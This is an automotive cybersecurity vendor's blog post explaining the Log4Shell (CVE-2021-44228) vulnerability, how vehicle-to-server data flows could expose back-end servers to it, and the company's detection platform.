Protecting Vehicles and Automotive Servers from log4shell


Lead Cyber Threat Researcher

Four days ago, the cybersecurity world was introduced to Log4Shell — one of the most profound vulnerabilities of 2021. We at Upstream were prepared for this day to come, with a holistic solution including detection capabilities meant to detect any attempt of misusing the vehicles’ communications and the vulnerability for malicious intents.

What is the Log4Shell Vulnerability?

Apache Log4j​​ is a Java-based logging library, which has made major headlines in recent days. As news and awareness of this threat spread, IT and cybersecurity teams were tasked with mitigating this newly discovered threat to protect their companies’ assets, data, and customers.

This vulnerability in Log4j, known as ‘Log4Shell’, was a zero-day vulnerability now assigned  CVE-2021-44228. This critical vulnerability in Log4j, allows an attacker to execute arbitrary code on systems using Log4j to write out log messages. For this reason, the vulnerability scored an alarmingly high 10 out of 10 on the CVSS score scale, a score to which not many have the “honor” of receiving.

On December 9th, the vulnerability was first introduced on GitHub. This first proof-of-concept exploit enabled unauthenticated remote code execution, leading to a complete system takeover. The next day, December 10th, usage of the exploit was reported, identifying massive scanning from multiple hosts for servers using versions of Apache Log4j vulnerable to the exploit. This showed not only the potential risks and impact of the vulnerability across industries but also why it was so critical to be patched.

What’s Log4Shell’s impact on the Automotive industry?

Connected vehicles collect information about every detail throughout the vehicle’s life, communicating with their OEMs’ telematics and application back-end servers. Beyond OEM servers, other services that communicate with vehicles might belong to aftermarket companies including insurance companies, fleets providers, commercial fleets, car rental and leasing companies, and more.

This connection between the vehicles and their open channel with the companies’ servers is exactly the spot where they are vulnerable to the Log4Shell vulnerability.

The servers that communicate with the vehicles are application servers. Ultimately, they are tasked with reading and writing data, making them vulnerable to attacks, such as injection attacks, just like many other servers.

The Log4Shell vulnerability is an example of a weakness that jeopardizes the security of any automotive-related server since the data traversing between the vehicle and server is collected, stored, and logged over a period of time in different systems or environments. This puts the vehicle data at risk of being impacted by the Log4Shell vulnerability.

By exploiting the connection between the vehicles and company servers, threat actors can access company assets. This can be achieved by communicating directly with the telematics data servers, to the back-end infrastructure and internal servers, bypassing many existing security controls in place.

As a matter of fact, this vulnerability can be exploited by inserting arbitrary code in a user-input field through applications, such as an infotainment system.

We witnessed how internal systems can be affected by these kinds of attacks as well as originate from the vehicle interface in 2019. In this incident, a hacker manipulated his Tesla model 3 by setting a nickname for his car, which led the OEM’s server into exposing private vehicle information. The hacker discovered a stored cross-site scripting (XSS) vulnerability that could have been exploited to obtain — and possibly modify — vehicle information. He was able to expose some internal Tesla application data.

Exploiting the vulnerability in different attack vectors.


Upstream’s Holistic Approach to Mitigation and Protection

Upstream’s products and services for automotive cybersecurity have worked together to create a full immediate response to the disclosure of the Log4Shell vulnerability.

Once an alert was triggered, our researchers learned and identified the problem, and its potential risks. After a thorough and fast evaluation, they worked with our VSOC operations team, to take protective steps and measures to allow our customers to have early detection and response capabilities.

Upstream’s platform monitors connected vehicle data and communications with the automotive application servers. The platform secures the dataflow and alerts on injection attacks, through purpose-built detection capabilities that flag these sorts of attacks.

In light of the disclosure of the Log4Shell vulnerability, our platform’s detection abilities for injections was extended to include the detection of the Log4Shell exploit in connected automotive data; be it vehicle data or companion-app back-end data. Adding a Log4Shell detection capability, The Upstream Platform provides early detection and response of any attempt to exploit this vector of communication, mitigating against any exploitation attempt of this vector.

Thanks to The Upstream Platform, combined with our AutoThreat® Intelligence and VSOC service, many CISOs learned about the patch before even learning about the Log4Shell vulnerability.

Newsletter Icon

Upstream’s 2023 Global Automotive Cybersecurity Report

Newsletter Icon

to our newsletter

Sign up to receive updates delivered to your inbox

API Security Needs to be Integral in Automotive Threat Analysis and Risk Assesment

APIs enable the opportunity to innovate and improve services in the connected vehicle and smart mobility ecosystem. APIs are widely used in advanced features, services…

Read more

NHTSA Updates US Cybersecurity Guidelines for Vehicles

Connected and software-defined vehicles technologies are on the rise, offering customers a better user experience, and introducing new monetization strategies for OEMs. Given the rising…

Read more

Upstream Partners with Salesforce, Putting Connected Vehicle Data in Motion

The automotive industry is undergoing a massive transformation, building new revenue streams and business opportunities. Connected vehicle and smart mobility data are at the core…

Read more

Securing Smart Mobility Requires a Fresh Approach to API Security

Connected vehicles and smart mobility services use numerous APIs. Everything from OEM-driven companion apps, infotainment systems, OTA servers, telematics servers, and EV charging management or…

Read more